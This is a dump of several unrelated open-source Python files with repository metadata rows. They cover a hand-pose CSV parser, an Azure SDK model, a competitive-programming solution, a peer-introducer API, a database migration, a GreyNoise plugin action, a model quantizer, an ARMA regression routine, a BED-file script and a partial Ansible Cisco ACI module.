    # note that the position and orientation don't have to be at the same time in the csv
    # quaternion is [w,x,y,z]
    def getNextHandConfig(filePtr):
        DEPRECATED
        get the next position and orientation in the file
        note that the position and orientation don't have to be at the same time in the csv
        quaternion is [w,x,y,z]
        :param filePtr:
        :return:
        posRet = []
        quatRet = []
        timeRet = []
        while posRet == [] or quatRet == []:
            line = filePtr.readline()
            if line == '':
                return [posRet, quatRet, timeRet]
            lineArr = line.split(',')
            time = extractTime(lineArr[0])
            if posRet == []:
                posXs = lineArr[1]
                posYs = lineArr[2]
                posZs = lineArr[3]
                if not posXs == '':
                    posRet = [float(posXs), float(posYs), float(posZs)]
                    if not posRet == [] and not quatRet == []:
                        timeRet = time
                        break
            if quatRet == []:
                quatWs = lineArr[4]
                quatXs = lineArr[5]
                quatYs = lineArr[6]
                quatZs = lineArr[7]
                if not quatWs == '':
                    quatRet = [float(quatWs),float(quatXs),float(quatYs),float(quatZs)]
                    if not posRet == [] and not quatRet == []:
                        timeRet = time
                        break
        posRet = transformPosition(posRet)
        quatRet = transformQuat(quatRet)
        # posRet = transformToGripperPos(posRet,quatRet)
        posRet = tc.getCenterPosition(posRet, quatRet, 0.5)
        return [posRet, quatRet, timeRet]
    '''
    '''
    def extractTime(timeLine):
        takes in the time header from the bag file and extracts the time
        :param timeLine:
        :return:
        timeArr = timeLine.split(':')
        return float(timeArr[-1])
    '''
| [
"[email protected]"
] | |
2793bf43cb383c357d70e567eeb97526b4f54f97 | ba0e07b34def26c37ee22b9dac1714867f001fa5 | /azure-mgmt-web/azure/mgmt/web/models/network_access_control_entry.py | c63dd1cc8d4c8aec142f71ba8f7c5dea394ffc61 | [
"MIT"
] | permissive | CharaD7/azure-sdk-for-python | b11a08ac7d24a22a808a18203072b4c7bd264dfa | 9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c | refs/heads/master | 2023-05-12T12:34:26.172873 | 2016-10-26T21:35:20 | 2016-10-26T21:35:20 | 72,448,760 | 1 | 0 | MIT | 2023-05-04T17:15:01 | 2016-10-31T15:14:09 | Python | UTF-8 | Python | false | false | 1,424 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class NetworkAccessControlEntry(Model):
"""NetworkAccessControlEntry.
:param action: Possible values include: 'Permit', 'Deny'
:type action: str or :class:`AccessControlEntryAction
<azure.mgmt.web.models.AccessControlEntryAction>`
:param description:
:type description: str
:param order:
:type order: int
:param remote_subnet:
:type remote_subnet: str
"""
_attribute_map = {
'action': {'key': 'action', 'type': 'AccessControlEntryAction'},
'description': {'key': 'description', 'type': 'str'},
'order': {'key': 'order', 'type': 'int'},
'remote_subnet': {'key': 'remoteSubnet', 'type': 'str'},
}
def __init__(self, action=None, description=None, order=None, remote_subnet=None):
self.action = action
self.description = description
self.order = order
self.remote_subnet = remote_subnet
| [
"[email protected]"
] | |
8fcbfa32a3cb2aab4ae34e37e6ff4a569f55b5ae | 41c0cbfbe922f09df9c6a4237c06a28ef458761c | /1278 B hyper set .py | 293d5e43a6792d28080181b20ec02d965484ab1d | [] | no_license | adityachaudhary147/py-codes | 8d45bfe3d3b67e4e802a2c1e01199551ef226aaa | 6a8918b5c6fca19ff74cef0dcd676c04b28ee8c4 | refs/heads/master | 2023-04-12T09:52:09.622458 | 2021-05-17T07:44:29 | 2021-05-17T07:44:29 | 244,203,716 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 615 | py | #jai mata di#
import sys
sys.stdin = open('input.in', 'r')
sys.stdout = open('output.out', 'w')

# "Hyper Set": count triples of cards such that, at every position, the three
# letters are either all equal or all pairwise different.
n, k2 = map(int, input().split())

cards = set()
for _ in range(n):
    cards.add(input())

lookup = set(cards)
cards = list(cards)

LETTERS = {'E', 'T', 'S'}
total = 0
for i in range(n - 1):
    for j in range(i + 1, n):
        a, b = cards[i], cards[j]
        third = []
        for pos in range(k2):
            if a[pos] == b[pos]:
                # Equal letters: the completing card must match them.
                third.append(a[pos])
            else:
                # Different letters: the completing card carries the single
                # remaining letter of {E, T, S}.
                third.append((LETTERS - {a[pos], b[pos]}).pop())
        if ''.join(third) in lookup:
            total += 1

# Each valid triple is discovered once per unordered pair it contains.
print(total // 3)
| [
"[email protected]"
] | |
13e604425bfe67eacff60bf986160796280d1f75 | c9fe27dd429741f2fd6d567e0aa157871fa89bed | /fork/introducer/introducer_api.py | efb7a706c223b3bdead2640e2d913a38101611bd | [
"Apache-2.0"
] | permissive | Fork-Network/fork-blockchain | 858d3aefe359a3fff547cf4464f45216b3718fa3 | 4e7c55b5787376dabacc8049eac49c0bb0bfd855 | refs/heads/main | 2023-06-23T00:28:14.607265 | 2021-07-24T02:23:22 | 2021-07-24T02:23:22 | 388,574,519 | 7 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,919 | py | from typing import Callable, Optional
from fork.introducer.introducer import Introducer
from fork.protocols.introducer_protocol import RequestPeersIntroducer, RespondPeersIntroducer
from fork.protocols.protocol_message_types import ProtocolMessageTypes
from fork.server.outbound_message import Message, make_msg
from fork.server.ws_connection import WSForkConnection
from fork.types.peer_info import TimestampedPeerInfo
from fork.util.api_decorators import api_request, peer_required
from fork.util.ints import uint64
class IntroducerAPI:
    """Wire-protocol API surface of the introducer node."""
    # The introducer service this API delegates to.
    introducer: Introducer
    def __init__(self, introducer) -> None:
        self.introducer = introducer
    def _set_state_changed_callback(self, callback: Callable):
        # Introducers have no state-change notifications; intentionally a no-op.
        pass
    @peer_required
    @api_request
    async def request_peers_introducer(
        self,
        request: RequestPeersIntroducer,
        peer: WSForkConnection,
    ) -> Optional[Message]:
        # Respond to a peer-list request with up to max_peers_to_send vetted
        # peers, excluding the requester itself. Returns None (no reply) when
        # the server or its peer store is not available.
        max_peers = self.introducer.max_peers_to_send
        if self.introducer.server is None or self.introducer.server.introducer_peers is None:
            return None
        # Over-fetch (5x) so that filtering below still leaves enough peers.
        rawpeers = self.introducer.server.introducer_peers.get_peers(
            max_peers * 5, True, self.introducer.recent_peer_threshold
        )
        peers = []
        for r_peer in rawpeers:
            # Skip peers that have not passed vetting.
            if r_peer.vetted <= 0:
                continue
            # Never tell the requester about itself.
            if r_peer.host == peer.peer_host and r_peer.port == peer.peer_server_port:
                continue
            # Timestamp is zeroed out; the receiver does not need it here.
            peer_without_timestamp = TimestampedPeerInfo(
                r_peer.host,
                r_peer.port,
                uint64(0),
            )
            peers.append(peer_without_timestamp)
            if len(peers) >= max_peers:
                break
        self.introducer.log.info(f"Sending vetted {peers}")
        msg = make_msg(ProtocolMessageTypes.respond_peers_introducer, RespondPeersIntroducer(peers))
        return msg
| [
"[email protected]"
] | |
fb384863ec5d9329a46985b438244bc624df9626 | c24212464eb84588edc7903a8905f2a881d578c4 | /migrations/versions/46e80c86a0fb_.py | 044aab1785b0ec919d392c0f49889f32428e6dcb | [] | no_license | the-akira/Flask-Library | c533dc2fd1ac2d3d9e2732e7c7bed5b8cc7ca4bd | 833e77660053b1e95975ccdf8bf41a035722975c | refs/heads/master | 2023-05-25T12:08:15.898134 | 2023-02-07T23:36:50 | 2023-02-07T23:36:50 | 205,951,022 | 5 | 2 | null | 2023-02-15T22:08:36 | 2019-09-02T23:26:50 | HTML | UTF-8 | Python | false | false | 1,041 | py | """empty message
Revision ID: 46e80c86a0fb
Revises: 5ef733a72780
Create Date: 2022-05-14 05:28:36.082684
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '46e80c86a0fb'        # this migration's id
down_revision = '5ef733a72780'   # migration this one builds on
branch_labels = None             # no named branches
depends_on = None                # no cross-branch dependencies
def upgrade():
    """Add analysis.user_id with a FK to user.id; make book.image_book nullable."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column('analysis', sa.Column('user_id', sa.Integer(), nullable=True))
    op.create_foreign_key(None, 'analysis', 'user', ['user_id'], ['id'])
    op.alter_column('book', 'image_book',
               existing_type=sa.VARCHAR(length=20),
               nullable=True)
    # ### end Alembic commands ###
def downgrade():
    """Reverse upgrade(): restore NOT NULL on book.image_book, drop the FK and column."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.alter_column('book', 'image_book',
               existing_type=sa.VARCHAR(length=20),
               nullable=False)
    # Drop the (auto-named) foreign key before removing its column.
    op.drop_constraint(None, 'analysis', type_='foreignkey')
    op.drop_column('analysis', 'user_id')
    # ### end Alembic commands ###
| [
"[email protected]"
] | |
0af7ed5c92a7008afe7dce8d65ae9ad39ac90809 | c9500ad778b8521aaa85cb7fe3239989efaa4799 | /plugins/greynoise/icon_greynoise/actions/get_tag_details/action.py | 891477fb89da35b5e6cce9779412d9d97fdeb6ce | [
"MIT"
] | permissive | rapid7/insightconnect-plugins | 5a6465e720f114d71b1a82fe14e42e94db104a0b | 718d15ca36c57231bb89df0aebc53d0210db400c | refs/heads/master | 2023-09-01T09:21:27.143980 | 2023-08-31T10:25:36 | 2023-08-31T10:25:36 | 190,435,635 | 61 | 60 | MIT | 2023-09-14T08:47:37 | 2019-06-05T17:05:12 | Python | UTF-8 | Python | false | false | 1,087 | py | import insightconnect_plugin_runtime
from .schema import GetTagDetailsInput, GetTagDetailsOutput, Input, Component
# Custom imports below
from icon_greynoise.util.util import GNRequestFailure
from greynoise.exceptions import RequestFailure
class GetTagDetails(insightconnect_plugin_runtime.Action):
    """Plugin action that looks up the metadata entry for one GreyNoise tag."""
    def __init__(self):
        super(self.__class__, self).__init__(
            name="get_tag_details",
            description=Component.DESCRIPTION,
            input=GetTagDetailsInput(),
            output=GetTagDetailsOutput(),
        )
    def run(self, params={}):
        """Return the metadata dict for the requested tag, case-insensitively.

        Falls back to a {"name", "description": "Tag Not Found"} stub when no
        tag matches, and wraps GreyNoise request failures in GNRequestFailure.
        """
        # NOTE(review): mutable default `params={}` is a Python smell, but it
        # is never mutated here and follows the plugin SDK's convention.
        tag_name = params.get(Input.TAG_NAME).lower()
        output = {}
        try:
            # metadata() returns the full tag catalog; scan it for our tag.
            # Tag names are presumably unique -- if not, the last match wins.
            resp = self.connection.gn_client.metadata()
            for tag in resp["metadata"]:
                if tag["name"].lower() == tag_name:
                    output = tag
        except RequestFailure as e:
            raise GNRequestFailure(e.args[0], e.args[1])
        if output:
            return output
        else:
            return {"name": params.get(Input.TAG_NAME), "description": "Tag Not Found"}
| [
"[email protected]"
] | |
314851d86273e01bceb3c684924368522f40ba2e | 9a3b9de5eba5585cff302dde267920269ab338ae | /zeus/networks/quant.py | eea5ce5ab0b4276fa82f0bbd22fd4222941b3d2e | [
"MIT"
] | permissive | Jizhongpeng/xingtian | 835f5b8d997d5dcdd13a77ad10bc658704892b18 | a9bdde734f14111854ed666dfdc780d5fe5311b1 | refs/heads/master | 2023-01-09T13:07:41.498246 | 2020-11-10T01:24:42 | 2020-11-10T01:24:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,935 | py | # -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Quantized Convlution."""
import logging
import zeus
from zeus.modules.operators import ops, quant
from zeus.common import ClassFactory, ClassType
@ClassFactory.register(ClassType.SEARCH_SPACE)
class Quantizer(object):
    """Model Quantization class.

    Walks a model's modules and replaces Conv2d layers with quantized
    convolutions, using per-layer weight/activation bit widths.
    """
    def __init__(self, model, nbit_w_list=8, nbit_a_list=8, skip_1st_layer=True):
        """Store the model and the weight/activation bit-width settings.

        nbit_w_list / nbit_a_list may be a single int (applied to every conv)
        or a list consumed one entry per quantized conv (see _next_nbit).
        """
        super().__init__()
        # Position of the next entry to consume from the per-layer bit lists.
        self.idx = 0
        self.nbit_w_list = nbit_w_list
        self.nbit_a_list = nbit_a_list
        self.skip_1st_layer = skip_1st_layer
        self.model = model
    def _next_nbit(self):
        """Get next nbit (weight bits, activation bits) pair."""
        if isinstance(self.nbit_w_list, list) and isinstance(self.nbit_a_list, list):
            # NOTE(review): idx grows without a bounds check -- lists shorter
            # than the number of quantized convs would raise IndexError.
            nbit_w, nbit_a = self.nbit_w_list[self.idx], self.nbit_a_list[self.idx]
            self.idx += 1
        else:
            nbit_w, nbit_a = self.nbit_w_list, self.nbit_a_list
        return nbit_w, nbit_a
    def _quant_conv(self, model):
        """Quantize the convolutional layer; non-Conv2d inputs pass through unchanged."""
        if not isinstance(model, ops.Conv2d):
            return model
        nbit_w, nbit_a = self._next_nbit()
        quant_model = quant.QuantConv(model.in_channels, model.out_channels, model.kernel_size,
                                      model.stride, model.padding, model.dilation, model.groups, model.bias)
        quant_model.build(nbit_w=nbit_w, nbit_a=nbit_a)
        if zeus.is_torch_backend():
            # On the torch backend, 8-bit weights use the dedicated
            # QuantizeConv2d op instead of the generic QuantConv.
            if nbit_w == 8:
                quant_model = ops.QuantizeConv2d(model.in_channels, model.out_channels, model.kernel_size,
                                                 model.stride, model.padding, model.dilation, model.groups,
                                                 quant_bit=nbit_w)
        return quant_model
    def __call__(self):
        """Quantize the entire model."""
        if self.nbit_w_list is None or self.nbit_a_list is None:
            logging.warning("nbit_w or nbit_a is None, model can not be quantified.")
            return self.model
        is_first_conv = True
        for name, layer in list(self.model.named_modules()):
            # NOTE(review): this condition ties "skip non-conv layers" to
            # skip_1st_layer. When skip_1st_layer is False, non-conv layers
            # fall through and the first of them consumes the is_first_conv
            # skip below (which then no longer skips the first *conv*).
            # Confirm whether that coupling is intended.
            if not isinstance(layer, ops.Conv2d) and self.skip_1st_layer:
                continue
            if is_first_conv:
                is_first_conv = False
                continue
            quant_conv = self._quant_conv(layer)
            self.model.set_module(name, quant_conv)
        return self.model
    def custom_hooks(self):
        """Calculate flops and params."""
        return quant.quant_custom_ops()
| [
"[email protected]"
] | |
2db06d443b7fadfd5bf1b848b96ecd5dfcfcd003 | 10d98fecb882d4c84595364f715f4e8b8309a66f | /linear_dynamical_systems/iterated_regression.py | 86e5d1169c94d3a0da489858d906ac228f583206 | [
"Apache-2.0",
"CC-BY-4.0"
] | permissive | afcarl/google-research | 51c7b70d176c0d70a5ee31ea1d87590f3d6c6f42 | 320a49f768cea27200044c0d12f394aa6c795feb | refs/heads/master | 2021-12-02T18:36:03.760434 | 2021-09-30T20:59:01 | 2021-09-30T21:07:02 | 156,725,548 | 1 | 0 | Apache-2.0 | 2018-11-08T15:13:53 | 2018-11-08T15:13:52 | null | UTF-8 | Python | false | false | 5,392 | py | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Regularized iterated regression for estimating AR parameters in ARMA models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from statsmodels.regression.linear_model import OLS
from statsmodels.tools.tools import add_constant
from statsmodels.tsa.tsatools import lagmat
def fit_arparams_iter(outputs, inputs, p, q, r, l2_reg=0.0):
  """Iterative regression for estimating AR params in ARMAX(p, q, r) model.

  The iterative AR regression process provides consistent estimates for the
  AR parameters of an ARMAX(p, q, r) model after q iterative steps.
  It first fits an ARMAX(p, 0, r) model with least squares regression, then
  ARMAX(p, 1, r), and so on, ..., til ARMAX(p, q, r). At the i-th step, it
  fits an ARMAX(p, i, r) model, according to estimated error terms from the
  previous step.

  For description of the iterative regression method, see Section 2 of
  `Consistent Estimates of Autoregressive Parameters and Extended Sample
  Autocorrelation Function for Stationary and Nonstationary ARMA Models` at
  https://www.jstor.org/stable/2288340.

  The implementation here is a generalization of the method mentioned in the
  paper. We adapt the method for multidimensional outputs, exogenous inputs,
  nan handling, and also add regularization on the MA parameters.

  Args:
    outputs: Array with the output values from the LDS, nans allowed.
    inputs: Array with exogenous inputs values, nans allowed. Could be None.
    p: AR order, i.e. max lag of the autoregressive part.
    q: MA order, i.e. max lag of the error terms.
    r: Max lag of the exogenous inputs.
    l2_reg: L2 regularization coefficient, to be applied on MA coefficients.

  Returns:
    Fitted AR coefficients.

  Raises:
    ValueError: If the (lagged, nan-dropped) design matrix is too short to
      fit the requested model, or the fit yields an unexpected param count.
  """
  # Py3 fix: this function used Python-2-only `xrange` (3 occurrences), which
  # raises NameError under Python 3; `range` has identical iteration behavior.
  if outputs.shape[1] > 1:
    # If there are multiple output dimensions, fit autoregressive params on
    # each dimension separately and average.
    params_list = [
        fit_arparams_iter(outputs[:, j:j+1], inputs, p, q, r, l2_reg=l2_reg)
        for j in range(outputs.shape[1])]
    return np.mean(
        np.concatenate([a.reshape(1, -1) for a in params_list]), axis=0)
  # We include a constant term in regression.
  k_const = 1
  # Input dim. If inputs is None, then in_dim = 0.
  in_dim = 0
  if inputs is not None:
    in_dim = inputs.shape[1]
    # Lag the inputs to obtain [?, r], column j means series x_{t-j}.
    # Use trim to drop rows with unknown values both at beginning and end.
    lagged_in = np.concatenate(
        [lagmat(inputs[:, i], maxlag=r, trim='both') for i in range(in_dim)],
        axis=1)
    # Since we trim in beginning, the offset is r.
    lagged_in_offset = r
  # Lag the series itself to p-th order.
  lagged_out = lagmat(outputs, maxlag=p, trim='both')
  lagged_out_offset = p
  y = outputs
  y_offset = 0
  # Estimated residuals, initialized to 0.
  res = np.zeros_like(outputs)
  for i in range(q + 1):
    # Lag the residuals to i-th order in i-th iteration.
    lagged_res = lagmat(res, maxlag=i, trim='both')
    lagged_res_offset = y_offset + i
    # Compute offset in regression, since lagged_in, lagged_out, and lagged_res
    # have different offsets. Align them.
    if inputs is None:
      y_offset = max(lagged_out_offset, lagged_res_offset)
    else:
      y_offset = max(lagged_out_offset, lagged_res_offset, lagged_in_offset)
    y = outputs[y_offset:, :]
    # Concatenate all variables in regression.
    x = np.concatenate([
        lagged_out[y_offset - lagged_out_offset:, :],
        lagged_res[y_offset - lagged_res_offset:, :]
    ],
                       axis=1)
    if inputs is not None:
      x = np.concatenate([lagged_in[y_offset - lagged_in_offset:, :], x],
                         axis=1)
    # Add constant term as the first variable.
    x = add_constant(x, prepend=True)
    if x.shape[1] < k_const + in_dim * r + p + i:
      raise ValueError('Insufficient sequence length for model fitting.')
    # Drop rows with nans.
    arr = np.concatenate([y, x], axis=1)
    arr = arr[~np.isnan(arr).any(axis=1)]
    y_dropped_na = arr[:, 0:1]
    x_dropped_na = arr[:, 1:]
    # Only regularize the MA part.
    alpha = np.concatenate(
        [np.zeros(k_const + in_dim * r + p), l2_reg * np.ones(i)], axis=0)
    # When L1_wt = 0, it's ridge regression.
    olsfit = OLS(y_dropped_na, x_dropped_na).fit_regularized(
        alpha=alpha, L1_wt=0.0)
    # Update estimated residuals.
    res = y - np.matmul(x, olsfit.params.reshape(-1, 1))
  if len(olsfit.params) != k_const + in_dim * r + p + q:
    raise ValueError('Expected param len %d, got %d.' %
                     (k_const + in_dim * r + p + q, len(olsfit.params)))
  if q == 0:
    return olsfit.params[-p:]
  return olsfit.params[-(p + q):-q]
| [
"[email protected]"
] | |
59fc04f65d00227209003ea2836478c904403fdb | 34f365117eb1d846fa922c24f3fc650188ce9746 | /bin/bed2countString.py | a029e30899b4529ca74ab313a5ed6655280c54f6 | [
"MIT"
] | permissive | PinarSiyah/NGStoolkit | 53ac6d87a572c498414a246ae051785b40fbc80d | b360da965c763de88c9453c4fd3d3eb7a61c935d | refs/heads/master | 2021-10-22T04:49:51.153970 | 2019-03-08T08:03:28 | 2019-03-08T08:03:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 744 | py | #!/usr/bin/env python
import os
import sys
import bed
import generalUtils
import argparse
import random
# Command-line interface: input BED file, output path, FASTA reference, and
# the substring to count in each interval's sequence.
parser = argparse.ArgumentParser(description='count strings')
parser.add_argument('-i', required=True, help='input')
parser.add_argument('-o', required=True, help='output')
parser.add_argument('-fasta', required=True, help='fasta reference')
parser.add_argument('-string', required=True, help='string to count')
args = parser.parse_args()

bedFile = args.i
output = args.o
fasta = args.fasta
string = args.string

bedObject = bed.bed(bedFile)
# Bug fix: `out` was never defined before, so the first write raised
# NameError. Open the requested output file and close it deterministically.
with open(output, 'w') as out:
    for bedline in bedObject.read():
        # Count the substring in this interval's sequence, append the count
        # as an extra BED column, and write the augmented line out.
        count = bedline.countString(fasta, string)
        fields = bedline.fields()
        fields.append(str(count))
        line = bedline.fields2line(fields)
        out.write(line + '\n')
"[email protected]"
] | |
a570bfa4558c82748471c60e1e492652bbd4c4b6 | a66460a46611483dfbdc94c7996893f427e60d97 | /ansible/my_env/lib/python2.7/site-packages/ansible/modules/network/aci/aci_domain_to_vlan_pool.py | 41bc3c7d07d911e29c5a39ab423b1aaf06d43a9d | [
"MIT"
] | permissive | otus-devops-2019-02/yyashkin_infra | 06b57807dde26f94f501828c07503d6bf1d70816 | 0cd0c003884155ac922e3e301305ac202de7028c | refs/heads/master | 2020-04-29T02:42:22.056724 | 2019-05-15T16:24:35 | 2019-05-15T16:24:35 | 175,780,718 | 0 | 0 | MIT | 2019-05-15T16:24:36 | 2019-03-15T08:37:35 | HCL | UTF-8 | Python | false | false | 10,592 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Dag Wieers <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
# Module metadata consumed by Ansible tooling to classify support status.
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: aci_domain_to_vlan_pool
short_description: Bind Domain to VLAN Pools (infra:RsVlanNs)
description:
- Bind Domain to VLAN Pools on Cisco ACI fabrics.
notes:
- The C(domain) and C(vlan_pool) parameters should exist before using this module.
The M(aci_domain) and M(aci_vlan_pool) can be used for these.
- More information about the internal APIC class B(infra:RsVlanNs) from
L(the APIC Management Information Model reference,https://developer.cisco.com/docs/apic-mim-ref/).
author:
- Dag Wieers (@dagwieers)
version_added: '2.5'
options:
domain:
description:
- Name of the domain being associated with the VLAN Pool.
aliases: [ domain_name, domain_profile ]
domain_type:
description:
- Determines if the Domain is physical (phys) or virtual (vmm).
choices: [ fc, l2dom, l3dom, phys, vmm ]
pool:
description:
- The name of the pool.
aliases: [ pool_name, vlan_pool ]
pool_allocation_mode:
description:
- The method used for allocating VLANs to resources.
choices: [ dynamic, static]
required: yes
aliases: [ allocation_mode, mode ]
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
choices: [ absent, present, query ]
default: present
vm_provider:
description:
- The VM platform for VMM Domains.
- Support for Kubernetes was added in ACI v3.0.
- Support for CloudFoundry, OpenShift and Red Hat was added in ACI v3.1.
choices: [ cloudfoundry, kubernetes, microsoft, openshift, openstack, redhat, vmware ]
extends_documentation_fragment: aci
'''
EXAMPLES = r'''
- name: Bind a VMM domain to VLAN pool
aci_domain_to_vlan_pool:
host: apic
username: admin
password: SomeSecretPassword
domain: vmw_dom
domain_type: vmm
pool: vmw_pool
pool_allocation_mode: dynamic
vm_provider: vmware
state: present
delegate_to: localhost
- name: Remove a VMM domain to VLAN pool binding
aci_domain_to_vlan_pool:
host: apic
username: admin
password: SomeSecretPassword
domain: vmw_dom
domain_type: vmm
pool: vmw_pool
pool_allocation_mode: dynamic
vm_provider: vmware
state: absent
delegate_to: localhost
- name: Bind a physical domain to VLAN pool
aci_domain_to_vlan_pool:
host: apic
username: admin
password: SomeSecretPassword
domain: phys_dom
domain_type: phys
pool: phys_pool
pool_allocation_mode: static
state: present
delegate_to: localhost
- name: Bind a physical domain to VLAN pool
aci_domain_to_vlan_pool:
host: apic
username: admin
password: SomeSecretPassword
domain: phys_dom
domain_type: phys
pool: phys_pool
pool_allocation_mode: static
state: absent
delegate_to: localhost
- name: Query an domain to VLAN pool binding
aci_domain_to_vlan_pool:
host: apic
username: admin
password: SomeSecretPassword
domain: phys_dom
domain_type: phys
pool: phys_pool
pool_allocation_mode: static
state: query
delegate_to: localhost
register: query_result
- name: Query all domain to VLAN pool bindings
aci_domain_to_vlan_pool:
host: apic
username: admin
password: SomeSecretPassword
domain_type: phys
state: query
delegate_to: localhost
register: query_result
'''
RETURN = r'''
current:
description: The existing configuration from the APIC after the module has finished
returned: success
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
error:
description: The error information as returned from the APIC
returned: failure
type: dict
sample:
{
"code": "122",
"text": "unknown managed object class foo"
}
raw:
description: The raw output returned by the APIC REST API (xml or json)
returned: parse error
type: string
sample: '<?xml version="1.0" encoding="UTF-8"?><imdata totalCount="1"><error code="122" text="unknown managed object class foo"/></imdata>'
sent:
description: The actual/minimal configuration pushed to the APIC
returned: info
type: list
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment"
}
}
}
previous:
description: The original configuration from the APIC before the module has started
returned: info
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
proposed:
description: The assembled configuration from the user-provided parameters
returned: info
type: dict
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"name": "production"
}
}
}
filter_string:
description: The filter string used for the request
returned: failure or debug
type: string
sample: ?rsp-prop-include=config-only
method:
description: The HTTP method used for the request to the APIC
returned: failure or debug
type: string
sample: POST
response:
description: The HTTP response from the APIC
returned: failure or debug
type: string
sample: OK (30 bytes)
status:
description: The HTTP status from the APIC
returned: failure or debug
type: int
sample: 200
url:
description: The HTTP url used for the request to the APIC
returned: failure or debug
type: string
sample: https://10.11.12.13/api/mo/uni/tn-production.json
'''
from ansible.module_utils.network.aci.aci import ACIModule, aci_argument_spec
from ansible.module_utils.basic import AnsibleModule
# Maps the lowercase `vm_provider` option values to the capitalization the
# APIC uses inside VMM distinguished names (uni/vmmp-<Provider>/dom-...).
VM_PROVIDER_MAPPING = dict(
    cloudfoundry='CloudFoundry',
    kubernetes='Kubernetes',
    microsoft='Microsoft',
    openshift='OpenShift',
    openstack='OpenStack',
    redhat='Redhat',
    vmware='VMware',
)
def main():
    """Entry point: bind/unbind/query a domain-to-VLAN-pool association."""
    argument_spec = aci_argument_spec()
    argument_spec.update(
        domain=dict(type='str', aliases=['domain_name', 'domain_profile']),  # Not required for querying all objects
        domain_type=dict(type='str', required=True, choices=['fc', 'l2dom', 'l3dom', 'phys', 'vmm']),  # Not required for querying all objects
        pool=dict(type='str', aliases=['pool_name', 'vlan_pool']),  # Not required for querying all objects
        pool_allocation_mode=dict(type='str', required=True, aliases=['allocation_mode', 'mode'], choices=['dynamic', 'static']),
        state=dict(type='str', default='present', choices=['absent', 'present', 'query']),
        vm_provider=dict(type='str', choices=['cloudfoundry', 'kubernetes', 'microsoft', 'openshift', 'openstack', 'redhat', 'vmware']),
    )
    module = AnsibleModule(
        argument_spec=argument_spec,
        supports_check_mode=True,
        required_if=[
            ['domain_type', 'vmm', ['vm_provider']],
            ['state', 'absent', ['domain', 'domain_type', 'pool']],
            ['state', 'present', ['domain', 'domain_type', 'pool']],
        ],
    )
    domain = module.params['domain']
    domain_type = module.params['domain_type']
    pool = module.params['pool']
    pool_allocation_mode = module.params['pool_allocation_mode']
    vm_provider = module.params['vm_provider']
    state = module.params['state']
    # Report when vm_provider is set when type is not virtual
    if domain_type != 'vmm' and vm_provider is not None:
        module.fail_json(msg="Domain type '{0}' cannot have a 'vm_provider'".format(domain_type))
    # ACI Pool URL requires the allocation mode for vlan and vsan pools (ex: uni/infra/vlanns-[poolname]-static)
    pool_name = pool
    if pool is not None:
        pool_name = '[{0}]-{1}'.format(pool, pool_allocation_mode)
    # Compile the full domain for URL building
    # Each branch sets the APIC class, managed-object DN, and relative name
    # for the chosen domain type.
    if domain_type == 'fc':
        domain_class = 'fcDomP'
        domain_mo = 'uni/fc-{0}'.format(domain)
        domain_rn = 'fc-{0}'.format(domain)
    elif domain_type == 'l2dom':
        domain_class = 'l2extDomP'
        domain_mo = 'uni/l2dom-{0}'.format(domain)
        domain_rn = 'l2dom-{0}'.format(domain)
    elif domain_type == 'l3dom':
        domain_class = 'l3extDomP'
        domain_mo = 'uni/l3dom-{0}'.format(domain)
        domain_rn = 'l3dom-{0}'.format(domain)
    elif domain_type == 'phys':
        domain_class = 'physDomP'
        domain_mo = 'uni/phys-{0}'.format(domain)
        domain_rn = 'phys-{0}'.format(domain)
    elif domain_type == 'vmm':
        # VMM domains nest under the provider (see VM_PROVIDER_MAPPING).
        domain_class = 'vmmDomP'
        domain_mo = 'uni/vmmp-{0}/dom-{1}'.format(VM_PROVIDER_MAPPING[vm_provider], domain)
        domain_rn = 'vmmp-{0}/dom-{1}'.format(VM_PROVIDER_MAPPING[vm_provider], domain)
    # Ensure that querying all objects works when only domain_type is provided
    if domain is None:
        domain_mo = None
    aci_mo = 'uni/infra/vlanns-{0}'.format(pool_name)
    aci = ACIModule(module)
    aci.construct_url(
        root_class=dict(
            aci_class=domain_class,
